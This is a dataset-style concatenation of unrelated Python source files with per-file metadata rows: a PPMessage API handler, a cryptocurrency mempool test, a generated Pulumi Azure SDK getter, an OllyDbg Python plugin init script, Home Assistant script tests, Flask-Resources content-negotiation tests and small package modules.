from ppmessage.api.error import API_ERR
from ppmessage.core.constant import API_LEVEL
from ppmessage.db.models import PredefinedScript
import json
import logging
class PPMovePredefinedScriptIntoGroup(BaseHandler):
    """API handler that moves a predefined script into another script group."""

    def _move(self):
        _request = json.loads(self.request.body)
        _group_uuid = str(_request.get("group_uuid"))
        _script_uuid = _request.get("script_uuid")
        if _script_uuid == None or len(_script_uuid) == 0:
            self.setErrorCode(API_ERR.NO_PARA)
            return
        # NOTE(review): `redis_hash_to_dict` is not among this file's visible
        # imports -- this call would raise NameError at runtime; confirm where
        # it is supposed to be imported from.
        _script = redis_hash_to_dict(self.application.redis, PredefinedScript, _script_uuid)
        if _script == None:
            # NOTE(review): no error code is set on this path, so the client
            # gets a success-shaped response even though nothing was moved.
            logging.error("No such script: %s" % _script_uuid)
            return
        # Remove the script from its previous group's redis set...
        _old_group_uuid = str(_script.get("group_uuid"))
        _key = PredefinedScript.__tablename__ + ".group_uuid." + _old_group_uuid
        self.application.redis.srem(_key, _script_uuid)
        # ...then persist the new group assignment and refresh the redis keys.
        _row = PredefinedScript(uuid=_script_uuid, group_uuid=_group_uuid)
        _row.async_update()
        _row.update_redis_keys(self.application.redis)
        return

    def initialize(self):
        # Require app scope plus console-level API access.
        self.addPermission(app_uuid=True)
        self.addPermission(api_level=API_LEVEL.PPCONSOLE)
        self.addPermission(api_level=API_LEVEL.THIRD_PARTY_CONSOLE)
        return

    def _Task(self):
        super(PPMovePredefinedScriptIntoGroup, self)._Task()
        self._move()
        return
| ppmessage/api/handlers/ppmovepredefinedscriptintogroup.py | 1,573 | -*- coding: utf-8 -*- Copyright (C) 2010-2016 PPMessage. Guijin Ding, dingguijin@gmail.com | 90 | en | 0.501723 |
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test spending coinbase transactions.
The coinbase transaction in block N can appear in block
N+100... so is valid in the mempool when the best block
height is N+99.
This test makes sure coinbase spends that will be mature
in the next block are accepted into the memory pool,
but less mature coinbase spends are NOT.
"""
from test_framework.test_framework import NestcoinTestFramework
from test_framework.blocktools import create_raw_transaction
from test_framework.util import assert_equal, assert_raises_rpc_error
class MempoolSpendCoinbaseTest(NestcoinTestFramework):
    """Checks mempool maturity rules for spends of coinbase outputs."""

    def set_test_params(self):
        self.num_nodes = 1

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def run_test(self):
        chain_height = self.nodes[0].getblockcount()
        assert_equal(chain_height, 200)
        node0_address = self.nodes[0].getnewaddress()

        # Coinbase at height chain_height-100+1 ok in mempool, should
        # get mined. Coinbase at height chain_height-100+2 is
        # too immature to spend.
        b = [self.nodes[0].getblockhash(n) for n in range(101, 103)]
        coinbase_txids = [self.nodes[0].getblock(h)['tx'][0] for h in b]
        spends_raw = [create_raw_transaction(self.nodes[0], txid, node0_address, amount=49.99) for txid in coinbase_txids]

        spend_101_id = self.nodes[0].sendrawtransaction(spends_raw[0])

        # coinbase at height 102 should be too immature to spend
        assert_raises_rpc_error(-26,"bad-txns-premature-spend-of-coinbase", self.nodes[0].sendrawtransaction, spends_raw[1])

        # mempool should have just spend_101:
        assert_equal(self.nodes[0].getrawmempool(), [ spend_101_id ])

        # mine a block, spend_101 should get confirmed
        self.nodes[0].generate(1)
        assert_equal(set(self.nodes[0].getrawmempool()), set())

        # ... and now height 102 can be spent:
        spend_102_id = self.nodes[0].sendrawtransaction(spends_raw[1])
        assert_equal(self.nodes[0].getrawmempool(), [ spend_102_id ])
if __name__ == '__main__':
    # Entry point when invoked directly by the functional test runner.
    MempoolSpendCoinbaseTest().main()
| test/functional/mempool_spend_coinbase.py | 2,321 | Test spending coinbase transactions.
The coinbase transaction in block N can appear in block
N+100... so is valid in the mempool when the best block
height is N+99.
This test makes sure coinbase spends that will be mature
in the next block are accepted into the memory pool,
but less mature coinbase spends are NOT.
!/usr/bin/env python3 Copyright (c) 2014-2018 The Bitcoin Core developers Distributed under the MIT software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php. Coinbase at height chain_height-100+1 ok in mempool, should get mined. Coinbase at height chain_height-100+2 is is too immature to spend. coinbase at height 102 should be too immature to spend mempool should have just spend_101: mine a block, spend_101 should get confirmed ... and now height 102 can be spent: | 835 | en | 0.869919 |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetSqlResourceSqlStoredProcedureResult',
'AwaitableGetSqlResourceSqlStoredProcedureResult',
'get_sql_resource_sql_stored_procedure',
]
@pulumi.output_type
class GetSqlResourceSqlStoredProcedureResult:
    """
    An Azure Cosmos DB storedProcedure.
    """
    # NOTE: generated by the Pulumi SDK Generator; only comments added here.
    def __init__(__self__, id=None, location=None, name=None, resource=None, tags=None, type=None):
        # Validate the raw engine outputs before storing them on the output type.
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if location and not isinstance(location, str):
            raise TypeError("Expected argument 'location' to be a str")
        pulumi.set(__self__, "location", location)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if resource and not isinstance(resource, dict):
            raise TypeError("Expected argument 'resource' to be a dict")
        pulumi.set(__self__, "resource", resource)
        if tags and not isinstance(tags, dict):
            raise TypeError("Expected argument 'tags' to be a dict")
        pulumi.set(__self__, "tags", tags)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The unique resource identifier of the ARM resource.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def location(self) -> Optional[str]:
        """
        The location of the resource group to which the resource belongs.
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        The name of the ARM resource.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def resource(self) -> Optional['outputs.SqlStoredProcedureGetPropertiesResponseResource']:
        return pulumi.get(self, "resource")

    @property
    @pulumi.getter
    def tags(self) -> Optional[Mapping[str, str]]:
        """
        Tags are a list of key-value pairs that describe the resource. These tags can be used in viewing and grouping this resource (across resource groups). A maximum of 15 tags can be provided for a resource. Each tag must have a key no greater than 128 characters and value no greater than 256 characters. For example, the default experience for a template type is set with "defaultExperience": "Cassandra". Current "defaultExperience" values also include "Table", "Graph", "DocumentDB", and "MongoDB".
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        The type of Azure resource.
        """
        return pulumi.get(self, "type")
class AwaitableGetSqlResourceSqlStoredProcedureResult(GetSqlResourceSqlStoredProcedureResult):
    # pylint: disable=using-constant-test
    def __await__(self):
        # Makes the result usable with `await`: the `if False` branch turns
        # this into a generator without ever yielding, so awaiting returns a
        # plain result copy immediately.
        if False:
            yield self
        return GetSqlResourceSqlStoredProcedureResult(
            id=self.id,
            location=self.location,
            name=self.name,
            resource=self.resource,
            tags=self.tags,
            type=self.type)
def get_sql_resource_sql_stored_procedure(account_name: Optional[str] = None,
                                          container_name: Optional[str] = None,
                                          database_name: Optional[str] = None,
                                          resource_group_name: Optional[str] = None,
                                          stored_procedure_name: Optional[str] = None,
                                          opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSqlResourceSqlStoredProcedureResult:
    """
    An Azure Cosmos DB storedProcedure.


    :param str account_name: Cosmos DB database account name.
    :param str container_name: Cosmos DB container name.
    :param str database_name: Cosmos DB database name.
    :param str resource_group_name: The name of the resource group. The name is case insensitive.
    :param str stored_procedure_name: Cosmos DB storedProcedure name.
    """
    # Marshal the arguments into the invoke payload expected by the provider.
    __args__ = dict()
    __args__['accountName'] = account_name
    __args__['containerName'] = container_name
    __args__['databaseName'] = database_name
    __args__['resourceGroupName'] = resource_group_name
    __args__['storedProcedureName'] = stored_procedure_name
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        # Default to this SDK's pinned provider version.
        opts.version = _utilities.get_version()
    __ret__ = pulumi.runtime.invoke('azure-native:documentdb/v20200401:getSqlResourceSqlStoredProcedure', __args__, opts=opts, typ=GetSqlResourceSqlStoredProcedureResult).value

    return AwaitableGetSqlResourceSqlStoredProcedureResult(
        id=__ret__.id,
        location=__ret__.location,
        name=__ret__.name,
        resource=__ret__.resource,
        tags=__ret__.tags,
        type=__ret__.type)
| sdk/python/pulumi_azure_native/documentdb/v20200401/get_sql_resource_sql_stored_procedure.py | 5,466 | An Azure Cosmos DB storedProcedure.
An Azure Cosmos DB storedProcedure.
:param str account_name: Cosmos DB database account name.
:param str container_name: Cosmos DB container name.
:param str database_name: Cosmos DB database name.
:param str resource_group_name: The name of the resource group. The name is case insensitive.
:param str stored_procedure_name: Cosmos DB storedProcedure name.
The unique resource identifier of the ARM resource.
The location of the resource group to which the resource belongs.
The name of the ARM resource.
Tags are a list of key-value pairs that describe the resource. These tags can be used in viewing and grouping this resource (across resource groups). A maximum of 15 tags can be provided for a resource. Each tag must have a key no greater than 128 characters and value no greater than 256 characters. For example, the default experience for a template type is set with "defaultExperience": "Cassandra". Current "defaultExperience" values also include "Table", "Graph", "DocumentDB", and "MongoDB".
The type of Azure resource.
coding=utf-8 *** WARNING: this file was generated by the Pulumi SDK Generator. *** *** Do not edit by hand unless you're certain you know what you are doing! *** pylint: disable=using-constant-test | 1,269 | en | 0.766132 |
import os
import sys
import time
import _ollyapi
def addscriptpath(script):
    """
    Add the path part of the scriptfile to the system path to
    allow modules to be loaded from the same place.

    Each path is added only once.
    """
    scriptpath = os.path.dirname(script)
    # Idiomatic membership test replaces the original manual search loop
    # with a pathfound flag; behavior is identical.
    if scriptpath not in sys.path:
        sys.path.append(scriptpath)
def runscript(script):
    """
    Run the specified script after adding its directory path to
    system path.

    This function is used by the low-level plugin code.
    """
    addscriptpath(script)
    watchdog.reset()
    # Temporarily make the script itself the whole argv, then restore.
    saved_argv = sys.argv
    sys.argv = [script]
    execfile(script, globals())
    sys.argv = saved_argv
#-----------------------------------------------------------
# Take over the standard text outputs
#-----------------------------------------------------------
class MyStdOut:
    """
    Minimal file-like object that forwards stdout/stderr text to the
    OllyDbg log window.
    """
    def write(self, text):
        # The OllyDbg log window cannot display newlines, so drop them.
        stripped = text.replace('\n', '')
        if stripped:
            _ollyapi.Addtolist(0, 0, stripped)

    def flush(self):
        pass

    def isatty(self):
        return False
# Redirect stderr and stdout to the OllyDbg log window
sys.stdout = sys.stderr = MyStdOut()
# Assign a default sys.argv
sys.argv = [ "" ]
# Have to make sure Python finds our modules
# NOTE(review): OLLYPYTHON_PATH is not defined in this file -- presumably
# injected into the globals by the host plugin before this script runs;
# confirm against the plugin loader.
sys.path.append(OLLYPYTHON_PATH)
from ollyapi import *
from ollyutils import *
#-------------------------------------------------------------
# Watchdog to catch runaway scripts after a specified timeout
#
# Usage:
# watchdog.install()
# watchdog.activate(10) # Use 10-second timeout
#
# Note: The watchdog only works for code running inside
# functions, not in global/module namespace.
#-------------------------------------------------------------
class WatchDog():
    """
    Python tracer-based watchdog class.

    activate()/reset() record a timestamp; the installed trace function is
    meant to compare elapsed time against the timeout (the actual check is
    currently commented out in tracer()).
    """
    def __init__(self, timeout=10):
        # Last reset time (time.clock() units); 0 until reset() is called.
        self.timestamp = 0
        # Seconds before a script is considered runaway.
        self.timeout = timeout
        self.installed = False
        self.active = False

    def install(self):
        """ Install the tracer function, required for the watchdog """
        if not self.installed:
            sys.settrace(self.tracer)
            self.installed = True

    def activate(self, timeout=None):
        """ Activate the watchdog, with optional timeout change """
        assert self.installed, "WatchDog must be installed before activating"
        if timeout:
            self.timeout = timeout
        self.reset()
        self.active = True

    def deactivate(self):
        """ Deactivate the watchdog """
        # BUG FIX: this previously set self.active = True, so the watchdog
        # could never actually be turned off once activated.
        self.active = False

    def reset(self):
        """ Reset the timer, useful for long-running scripts """
        self.timestamp = time.clock()

    def tracer(self, frame, event, arg):
        """ Tracer function that receives the tracing events """
        if not self.active:
            return None
        #if event == 'line':
        #    if time.clock() - self.timestamp > self.timeout:
        #        if AskYN(0, "The script has not finished in %d seconds\nWould you like to stop it now?" % self.timeout) == 1:
        #            raise KeyboardInterrupt
        #        else:
        #            self.timestamp = time.clock()
        return self.tracer
# Module-level watchdog instance used by runscript() above.
watchdog = WatchDog(10)
# Load the users personal init file
# NOTE(review): no code follows the comment above -- loading of a personal
# init file appears to be unimplemented here (or done by the host plugin).
# Plugin callback handlers
ollypython_shortcuts = []
def add_shortcut_handler(func):
    # Need to also make sure the function is the right type
    ollypython_shortcuts.append(func)
def remove_shortcut_handler(func):
ollypython_shortcuts.remove(func) | python/init.py | 3,902 | Dummy file-like class that receives stout and stderr
Python tracer-based watchdog class
Activate the watchdog, with optional timeout change
Add the path part of the scriptfile to the system path to
allow modules to be loaded from the same place.
Each path is added only once.
Deactivate the watchdog
Install the tracer function, required for the watchdog
Reset the timer, useful for long-running scripts
Run the specified script after adding its directory path to
system path.
This function is used by the low-level plugin code.
Tracer function that receives the tracing events
----------------------------------------------------------- Take over the standard text outputs----------------------------------------------------------- OllyDbg can't handle newlines so strip them out Redirect stderr and stdout to the OllyDbg log window Assign a default sys.argv Have to make sure Python finds our modules------------------------------------------------------------- Watchdog to catch runaway scripts after a specified timeout Usage: watchdog.install() watchdog.activate(10) Use 10-second timeout Note: The watchdog only works for code running inside functions, not in global/module namespace. -------------------------------------------------------------if event == 'line': if time.clock() - self.timestamp > self.timeout: if AskYN(0, "The script has not finished in %d seconds\nWould you like to stop it now?" % self.timeout) == 1: raise KeyboardInterrupt else: self.timestamp = time.clock() Load the users personal init file Plugin callback handlers Need to also make sure the function is the right type | 1,679 | en | 0.676365 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import *
from builtins import object
# String keys distinguishing where reads data lives: stored location vs. URL.
READS_LOCATION = 'genestack.location:reads'
READS_LINK = 'genestack.url:reads'
class Key(object):
    """Dictionary keys of the format map built by compose_format_map()."""
    SPACE = 'space'
    FORMAT = 'format'
    TYPE = 'type'
class Space(object):
    """Allowed values for the Key.SPACE entry."""
    BASESPACE = 'basespace'
    COLORSPACE = 'colorspace'
class Format(object):
    """Allowed values for the Key.FORMAT entry."""
    PHRED33 = 'phred33'
    PHRED64 = 'phred64'
    FASTA_QUAL = 'fasta-qual'
    SRA = 'sra'
    SFF = 'sff'
    FAST5 = 'fast5'
class Type(object):
    """Allowed values for the Key.TYPE entry."""
    SINGLE = 'single'
    PAIRED = 'paired'
    PAIRED_WITH_UNPAIRED = 'paired-with-unpaired'
def compose_format_map(space, file_format, file_type):
    """Assemble a format-map dict from its three components."""
    format_map = {}
    format_map[Key.SPACE] = space
    format_map[Key.FORMAT] = file_format
    format_map[Key.TYPE] = file_type
    return format_map
| genestack_client/unaligned_reads.py | 964 | -*- coding: utf-8 -*- | 21 | en | 0.767281 |
"""The tests for the Script component."""
# pylint: disable=protected-access
import unittest
from unittest.mock import patch, Mock
from homeassistant.components import script
from homeassistant.components.script import DOMAIN
from homeassistant.const import (
ATTR_ENTITY_ID, ATTR_NAME, SERVICE_RELOAD, SERVICE_TOGGLE,
SERVICE_TURN_OFF, SERVICE_TURN_ON, EVENT_SCRIPT_STARTED)
from homeassistant.core import Context, callback, split_entity_id
from homeassistant.loader import bind_hass
from homeassistant.setup import setup_component, async_setup_component
from tests.common import get_test_home_assistant
ENTITY_ID = 'script.test'
@bind_hass
def turn_on(hass, entity_id, variables=None, context=None):
    """Turn script on.

    This is a legacy helper method. Do not use it for new tests.
    """
    object_id = split_entity_id(entity_id)[1]
    hass.services.call(DOMAIN, object_id, variables, context=context)
@bind_hass
def turn_off(hass, entity_id):
    """Turn script off.

    This is a legacy helper method. Do not use it for new tests.
    """
    # Docstring fixed: it previously said "Turn script on." (copy-paste).
    hass.services.call(DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: entity_id})
@bind_hass
def toggle(hass, entity_id):
    """Toggle the script.

    This is a legacy helper method. Do not use it for new tests.
    """
    service_data = {ATTR_ENTITY_ID: entity_id}
    hass.services.call(DOMAIN, SERVICE_TOGGLE, service_data)
@bind_hass
def reload(hass):
    """Reload the script component's configuration.

    This is a legacy helper method. Do not use it for new tests.
    """
    hass.services.call(DOMAIN, SERVICE_RELOAD)
class TestScriptComponent(unittest.TestCase):
    """Test the Script component."""
    # pylint: disable=invalid-name
    def setUp(self):
        """Set up things to be run when tests are started."""
        self.hass = get_test_home_assistant()
    # pylint: disable=invalid-name
    def tearDown(self):
        """Stop everything that was started."""
        self.hass.stop()
    def test_setup_with_invalid_configs(self):
        """Test setup with invalid configs."""
        # Invalid cases: empty script config, a space in the object id,
        # and a sequence that is a dict instead of a list.
        for value in (
            {'test': {}},
            {
                'test hello world': {
                    'sequence': [{'event': 'bla'}]
                }
            },
            {
                'test': {
                    'sequence': {
                        'event': 'test_event',
                        'service': 'homeassistant.turn_on',
                    }
                }
            },
        ):
            assert not setup_component(self.hass, 'script', {
                'script': value
            }), 'Script loaded with wrong config {}'.format(value)
            assert 0 == len(self.hass.states.entity_ids('script'))
    def test_turn_on_service(self):
        """Verify that the turn_on service starts the script."""
        event = 'test_event'
        events = []
        @callback
        def record_event(event):
            """Add recorded event to set."""
            events.append(event)
        self.hass.bus.listen(event, record_event)
        # The leading delay keeps the script "running", so the event at the
        # end of the sequence must not have fired yet in the asserts below.
        assert setup_component(self.hass, 'script', {
            'script': {
                'test': {
                    'sequence': [{
                        'delay': {
                            'seconds': 5
                        }
                    }, {
                        'event': event,
                    }]
                }
            }
        })
        turn_on(self.hass, ENTITY_ID)
        self.hass.block_till_done()
        assert script.is_on(self.hass, ENTITY_ID)
        assert 0 == len(events)
        # Calling turn_on a second time should not advance the script
        turn_on(self.hass, ENTITY_ID)
        self.hass.block_till_done()
        assert 0 == len(events)
        turn_off(self.hass, ENTITY_ID)
        self.hass.block_till_done()
        assert not script.is_on(self.hass, ENTITY_ID)
        assert 0 == len(events)
        # Every script entity is tracked in the group.all_scripts group.
        state = self.hass.states.get('group.all_scripts')
        assert state is not None
        assert state.attributes.get('entity_id') == (ENTITY_ID,)
    def test_toggle_service(self):
        """Test the toggling of a service."""
        event = 'test_event'
        events = []
        @callback
        def record_event(event):
            """Add recorded event to set."""
            events.append(event)
        self.hass.bus.listen(event, record_event)
        assert setup_component(self.hass, 'script', {
            'script': {
                'test': {
                    'sequence': [{
                        'delay': {
                            'seconds': 5
                        }
                    }, {
                        'event': event,
                    }]
                }
            }
        })
        # First toggle starts the (delayed) script, second one stops it.
        toggle(self.hass, ENTITY_ID)
        self.hass.block_till_done()
        assert script.is_on(self.hass, ENTITY_ID)
        assert 0 == len(events)
        toggle(self.hass, ENTITY_ID)
        self.hass.block_till_done()
        assert not script.is_on(self.hass, ENTITY_ID)
        assert 0 == len(events)
    def test_passing_variables(self):
        """Test different ways of passing in variables."""
        calls = []
        context = Context()
        @callback
        def record_call(service):
            """Add recorded event to set."""
            calls.append(service)
        self.hass.services.register('test', 'script', record_call)
        assert setup_component(self.hass, 'script', {
            'script': {
                'test': {
                    'sequence': {
                        'service': 'test.script',
                        'data_template': {
                            'hello': '{{ greeting }}',
                        },
                    },
                },
            },
        })
        # Variables passed through the legacy turn_on helper...
        turn_on(self.hass, ENTITY_ID, {
            'greeting': 'world'
        }, context=context)
        self.hass.block_till_done()
        assert len(calls) == 1
        assert calls[0].context is context
        assert calls[0].data['hello'] == 'world'
        # ...and variables passed by calling the script service directly.
        self.hass.services.call('script', 'test', {
            'greeting': 'universe',
        }, context=context)
        self.hass.block_till_done()
        assert len(calls) == 2
        assert calls[1].context is context
        assert calls[1].data['hello'] == 'universe'
    def test_reload_service(self):
        """Verify that the reload service swaps in the new configuration."""
        assert setup_component(self.hass, 'script', {
            'script': {
                'test': {
                    'sequence': [{
                        'delay': {
                            'seconds': 5
                        }
                    }]
                }
            }
        })
        assert self.hass.states.get(ENTITY_ID) is not None
        assert self.hass.services.has_service(script.DOMAIN, 'test')
        with patch('homeassistant.config.load_yaml_config_file', return_value={
                'script': {
                    'test2': {
                        'sequence': [{
                            'delay': {
                                'seconds': 5
                            }
                        }]
                    }}}):
            with patch('homeassistant.config.find_config_file',
                       return_value=''):
                reload(self.hass)
                self.hass.block_till_done()
        # The old script and its service are gone, replaced by the new one.
        assert self.hass.states.get(ENTITY_ID) is None
        assert not self.hass.services.has_service(script.DOMAIN, 'test')
        assert self.hass.states.get("script.test2") is not None
        assert self.hass.services.has_service(script.DOMAIN, 'test2')
async def test_shared_context(hass):
    """Test that the shared context is passed down the chain."""
    event = 'test_event'
    context = Context()

    event_listener = Mock()
    started_listener = Mock()
    hass.bus.async_listen(event, event_listener)
    hass.bus.async_listen(EVENT_SCRIPT_STARTED, started_listener)

    assert await async_setup_component(hass, 'script', {
        'script': {
            'test': {
                'sequence': [
                    {'event': event}
                ]
            }
        }
    })

    await hass.services.async_call(
        DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: ENTITY_ID},
        context=context)
    await hass.async_block_till_done()

    assert event_listener.call_count == 1
    assert started_listener.call_count == 1

    # The script-started event carries the context and identifies the script.
    args, kwargs = started_listener.call_args
    assert args[0].context == context
    assert args[0].data.get(ATTR_NAME) == 'test'
    assert args[0].data.get(ATTR_ENTITY_ID) == 'script.test'

    # The fired event and the script state share that same context.
    args, kwargs = event_listener.call_args
    assert args[0].context == context

    state = hass.states.get('script.test')
    assert state is not None
    assert state.context == context
| tests/components/test_script.py | 8,952 | Test the Script component.
Add recorded event to set.
Add recorded event to set.
Add recorded event to set.
Reload script component.
This is a legacy helper method. Do not use it for new tests.
Set up things to be run when tests are started.
Stop everything that was started.
Test different ways of passing in variables.
Verify that the turn_on service.
Test setup with invalid configs.
Test the toggling of a service.
Verify that the turn_on service.
Toggle the script.
This is a legacy helper method. Do not use it for new tests.
Turn script on.
This is a legacy helper method. Do not use it for new tests.
Turn script on.
This is a legacy helper method. Do not use it for new tests.
The tests for the Script component.
pylint: disable=protected-access pylint: disable=invalid-name pylint: disable=invalid-name Calling turn_on a second time should not advance the script Ensure event data has all attributes set Ensure context carries through the event Ensure the script state shares the same context | 1,013 | en | 0.81422 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
# Copyright (C) 2020 Northwestern University.
#
# Flask-Resources is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
from werkzeug.datastructures import MIMEAccept
from werkzeug.http import parse_accept_header
from flask_resources.content_negotiation import ContentNegotiator
# Test content negotiation by Accept header
# NOTE: By scoping down we remove the need to check for HTTP method
def test_choose_provided_and_accepted_mimetype():
    """Negotiation picks a mimetype both served and accepted."""
    served = ["application/json", "application/marcxml+xml"]

    accepted = parse_accept_header(
        "text/plain,application/json,*/*", MIMEAccept
    )
    assert ContentNegotiator.match_by_accept(served, accepted) == (
        "application/json"
    )

    accepted = parse_accept_header(
        "text/plain,application/marcxml+xml,*/*", MIMEAccept
    )
    assert ContentNegotiator.match_by_accept(served, accepted) == (
        "application/marcxml+xml"
    )
def test_favour_specificity_over_quality():
    """A concrete mimetype beats a higher-quality wildcard."""
    served = ["application/json", "application/marcxml+xml"]
    accepted = parse_accept_header(
        "text/plain, application/json;q=0.5, */*", MIMEAccept
    )
    assert ContentNegotiator.match_by_accept(served, accepted) == (
        "application/json"
    )
def test_favour_quality_over_same_specificity():
    """Among equally specific mimetypes the higher quality wins."""
    served = ["application/json", "application/marcxml+xml"]
    cases = [
        ("application/json;q=0.5, application/marcxml+xml",
         "application/marcxml+xml"),
        ("application/marcxml+xml;q=0.4, application/json;q=0.6",
         "application/json"),
    ]
    for header, expected in cases:
        accepted = parse_accept_header(header, MIMEAccept)
        assert ContentNegotiator.match_by_accept(served, accepted) == expected
def test_choose_default_if_no_match_and_wildcard_accepted():
    """Fall back to the default when only the client wildcard matches."""
    served = ["application/json", "application/marcxml+xml"]
    accepted = parse_accept_header("text/plain,*/*", MIMEAccept)
    result = ContentNegotiator.match_by_accept(
        served, accepted, default="application/json"
    )
    assert result == "application/json"
def test_choose_none_if_no_match_and_wildcard_not_accepted():
    """Return None when nothing matches and no wildcard is offered."""
    served = ["application/json", "application/marcxml+xml"]
    accepted = parse_accept_header("text/plain", MIMEAccept)
    result = ContentNegotiator.match_by_accept(
        served, accepted, default="application/json"
    )
    assert result is None
def test_choose_default_if_nothing_accepted():
    """An empty Accept header falls back to the default."""
    served = ["application/json", "application/marcxml+xml"]
    accepted = parse_accept_header("", MIMEAccept)
    result = ContentNegotiator.match_by_accept(
        served, accepted, default="application/json"
    )
    assert result == "application/json"
# Test content negotiation by URL argument
# NOTE: By scoping down we remove the need to check for HTTP method
def test_choose_query_mimetype():
    """The format URL argument selects the mapped mimetype."""
    known_formats = {
        "json": "application/json",
        "marcxml": "application/marcxml+xml",
    }
    assert ContentNegotiator.match_by_format(known_formats, "marcxml") == (
        "application/marcxml+xml"
    )
    assert ContentNegotiator.match_by_format(known_formats, "json") == (
        "application/json"
    )
    # Unknown formats yield no mimetype at all.
    assert ContentNegotiator.match_by_format(known_formats, "foo") is None
# Test top-level ContentNegotiator.match
def test_favour_query_mimetype_over_header_mimetype():
    """The format URL argument wins over the Accept header."""
    served = ["application/json", "application/marcxml+xml"]
    known_formats = {
        "json": "application/json",
        "marcxml": "application/marcxml+xml",
    }

    accepted = parse_accept_header("application/json", MIMEAccept)
    assert ContentNegotiator.match(
        served, accepted, known_formats, "marcxml"
    ) == "application/marcxml+xml"

    accepted = parse_accept_header("application/marcxml+xml", MIMEAccept)
    assert ContentNegotiator.match(
        served, accepted, known_formats, "json"
    ) == "application/json"
def test_favour_header_mimetype_if_no_query_mimetype():
    """Without a usable URL argument the Accept header decides."""
    served = ["application/json", "application/marcxml+xml"]
    accepted = parse_accept_header("application/json", MIMEAccept)

    known_formats = {
        "json": "application/json",
        "marcxml": "application/marcxml+xml",
    }
    assert ContentNegotiator.match(served, accepted, known_formats, None) == (
        "application/json"
    )
    # A format argument with an empty formats map is ignored as well.
    assert ContentNegotiator.match(served, accepted, {}, "marcxml") == (
        "application/json"
    )
def test_choose_default_if_no_query_and_no_header():
    """With neither source of preference the default is used."""
    served = ["application/json", "application/marcxml+xml"]
    accepted = parse_accept_header("", MIMEAccept)
    known_formats = {
        "json": "application/json",
        "marcxml": "application/marcxml+xml",
    }
    result = ContentNegotiator.match(
        served, accepted, known_formats, None, default="application/json"
    )
    assert result == "application/json"
| tests/test_content_negotiation.py | 5,795 | -*- coding: utf-8 -*- Copyright (C) 2020 CERN. Copyright (C) 2020 Northwestern University. Flask-Resources is free software; you can redistribute it and/or modify it under the terms of the MIT License; see LICENSE file for more details. Test content negotiation by Accept header NOTE: By scoping down we remove the need to check for HTTP method Should choose mimetype that is accepted by client and served by server favour more specific but lower quality mimetype over less specific (e.g. wildcard) but higher quality choose default if no match and client accepts wildcard Test content negotiation by URL argument NOTE: By scoping down we remove the need to check for HTTP method this is the query Test top-level ContentNegotiator.match | 736 | en | 0.862127 |
# The MIT License (MIT)
#
# Copyright (c) 2015-present, vn-crypto
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from .deribit_gateway import DeribitGateway
import importlib_metadata
__version__ = importlib_metadata.version("vnpy_deribit") | vnpy_deribit/__init__.py | 1,253 | The MIT License (MIT) Copyright (c) 2015-present, vn-crypto Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. | 1,080 | en | 0.858611 |
# Copyright(c) 2016 Nippon Telegraph and Telephone Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
